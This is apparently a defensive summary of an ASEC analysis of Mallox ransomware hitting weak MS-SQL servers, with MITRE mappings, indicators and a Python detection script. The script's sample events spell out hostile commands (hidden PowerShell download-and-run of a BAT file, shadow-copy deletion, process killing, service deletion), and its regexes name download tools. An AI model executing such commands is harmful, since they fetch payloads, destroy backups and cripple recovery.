Analysis of Ransomware With BAT File Extension Attacking MS-SQL Servers (Mallox) – ASEC BLOG

Mallox ransomware is distributed to poorly managed MS-SQL servers using BAT files, a fileless tactic that leverages PowerShell and CMD to download and execute payloads like Mallox and Remcos RAT. It injects via process hollowing into MSBuild.exe, terminates processes and deletes services, and deletes volume shadow copies, while attackers rely on weak credentials; defenders should enforce strong passwords, patch systems, and deploy EDR for visibility. #Mallox #Remcos #MSQLServer #PowerShell #ProcessHollowing

Key points

  • Mallox and Remcos RAT are delivered via BAT files to poorly managed MS-SQL servers, highlighting non-PE/fileless delivery methods.
  • PowerShell (and sqlps) are used to download the BAT payloads, which are then executed via CMD.
  • Mallox is injected through process hollowing into MSBuild.exe, a known process-injection technique.
  • killerr.bat is created and executed to terminate multiple processes and to shut down and delete several services, hindering recovery.
  • Volume Shadow Copies are deleted, and commands to block recovery are logged during encryption procedures.
  • Attackers target MS-SQL servers often paired with ERP/business solutions and exploit weak credentials; defenders should use strong passwords, patching, and access controls, with EDR aiding incident analysis.

MITRE Techniques

  • [T1059.001] PowerShell – Used to download the BAT and trigger execution; “The BAT file downloaded by the PowerShell command is run with CMD.”
  • [T1059.003] Command-Line – The BAT file downloaded by the PowerShell command is run with CMD.
  • [T1105] Ingress Tool Transfer – The BAT file download is performed from a distribution URL (e.g., “tst.bat”).
  • [T1055.012] Process Hollowing – “the main part of Mallox is injected through process hollowing (one of the injection methods) into MSbuild.exe.”
  • [T1562] Impair Defenses – “shuts down and deletes a number of services.” (Modify/Delete System Services)
  • [T1490] Inhibit System Recovery – “volume shadow copies being deleted.”
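The technique list above maps cleanly onto process-creation telemetry, so a defender can turn it into a small set of behavioural checks. The following is an added example written for this summary (not ASEC's code, and not taken from the blog post): it runs heuristic rules over a handful of constructed process-creation events shaped like parsed Sysmon Event ID 1 / Windows 4688 records. The field names (`parent`, `image`, `cmdline`), the sample events, the placeholder download host and service name, and the rule patterns themselves are all assumptions; the technique IDs are the ones listed above.

```python
"""Process-creation heuristics for the Mallox-on-MS-SQL chain summarised above.

Added example for this summary; it is not ASEC's code. Events are assumed to
have been parsed from Sysmon Event ID 1 / Windows 4688 into dicts with the keys
'parent', 'image' and 'cmdline' (field names are an assumption).
"""
import re
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Set

SQL_PARENTS = frozenset({"sqlservr.exe", "sqlps.exe"})
SHELLS = frozenset({"cmd.exe", "powershell.exe", "pwsh.exe"})


def _basename(path: str) -> str:
    """Strip a Windows path down to the lower-cased image name."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


@dataclass(frozen=True)
class Rule:
    technique: str                          # technique id as listed in the summary
    description: str
    parents: FrozenSet[str] = frozenset()   # empty = any parent image
    images: FrozenSet[str] = frozenset()    # empty = any child image
    pattern: str = ""                       # empty = no command-line condition

    def matches(self, ev: Dict[str, str]) -> bool:
        if self.parents and _basename(ev["parent"]) not in self.parents:
            return False
        if self.images and _basename(ev["image"]) not in self.images:
            return False
        return not self.pattern or re.search(self.pattern, ev["cmdline"], re.I) is not None


# Heuristics (assumptions, not ASEC's detections) for the behaviours the post describes.
RULES: List[Rule] = [
    Rule("T1059.001", "shell or sqlps spawned by the MS-SQL server process",
         parents=SQL_PARENTS, images=SHELLS | {"sqlps.exe"}),
    Rule("T1105", "download cmdlet or utility in a shell command line",
         images=SHELLS,
         pattern=r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b|\bwget\b|\bbitsadmin\b"),
    Rule("T1059.003", "BAT file executed via CMD",
         images=frozenset({"cmd.exe"}), pattern=r"\.bat\b"),
    Rule("T1055.012", "MSBuild.exe launched from a shell with no project file (hollowing host candidate)",
         parents=SHELLS, images=frozenset({"msbuild.exe"}),
         pattern=r'^"?[^"]*msbuild(\.exe)?"?\s*$'),
    Rule("T1562", "service stopped/deleted or process killed (killerr.bat-style behaviour)",
         pattern=r"\bsc(\.exe)?\s+(stop|delete|config)\b|\bnet(\.exe)?\s+stop\b|\btaskkill(\.exe)?\b.*\s/(f|im)\b"),
    Rule("T1490", "volume shadow copies deleted",
         pattern=r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete|win32_shadowcopy"),
]

# Constructed sample events modelled on the chain in the post; host and service
# names are placeholders, not indicators from the incident.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": "sqlservr.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -nop -w hidden -c "Invoke-WebRequest hxxp://[distribution-host]/tst.bat -OutFile C:\\Users\\Public\\tst.bat"'},
    {"parent": "powershell.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c C:\\Users\\Public\\tst.bat"},
    {"parent": "cmd.exe", "image": "MSBuild.exe",
     "cmdline": '"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe"'},
    {"parent": "cmd.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c killerr.bat"},
    {"parent": "cmd.exe", "image": "taskkill.exe", "cmdline": "taskkill /f /im sqlwriter.exe"},
    {"parent": "cmd.exe", "image": "sc.exe", "cmdline": "sc delete ExampleSvc"},
    {"parent": "cmd.exe", "image": "vssadmin.exe", "cmdline": "vssadmin delete shadows /all /quiet"},
    # Lower-confidence context: a batch file run from the desktop, flagged only as T1059.003.
    {"parent": "explorer.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c build.bat"},
    # Benign build from Visual Studio: MSBuild gets a solution file and must not match T1055.012.
    {"parent": "devenv.exe", "image": "MSBuild.exe", "cmdline": "MSBuild.exe MyApp.sln /t:Build"},
]


def analyze(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one finding per (event, rule) match, in event order then rule order."""
    findings: List[Dict[str, object]] = []
    for i, ev in enumerate(events):
        for rule in RULES:
            if rule.matches(ev):
                findings.append({"event": i, "technique": rule.technique,
                                 "description": rule.description, "cmdline": ev["cmdline"]})
    return findings


def techniques_seen(events: List[Dict[str, str]]) -> Set[str]:
    """Set of technique ids observed across the events; useful for chain-level triage."""
    return {str(f["technique"]) for f in analyze(events)}


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"event {f['event']}: {f['technique']} - {f['description']}: {f['cmdline']}")
    print("techniques observed:", sorted(techniques_seen(SAMPLE_EVENTS)))
```

Two points of design: the MSBuild rule only fires when a shell launches MSBuild.exe with an empty command line, because a legitimate build passes a project or solution file, so the bare launch from cmd.exe on a database server is what stands out; and the single `.bat`-via-CMD rule is deliberately low confidence on its own, which is why `techniques_seen` matters: the combination of a SQL-server child shell, a download, shadow-copy deletion and service removal on one host is the signal, not any one line.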

Indicators of Compromise

  • [File] Ransomware BAT.MALLOX.SC189737 – 2023.06.13.02
  • [MD5] dcf060e00547cfe641eff3f836ec08c8
  • [URL] C2 – hxxp://80.66.75[.]116/tst.bat

Read more: https://asec.ahnlab.com/en/54704/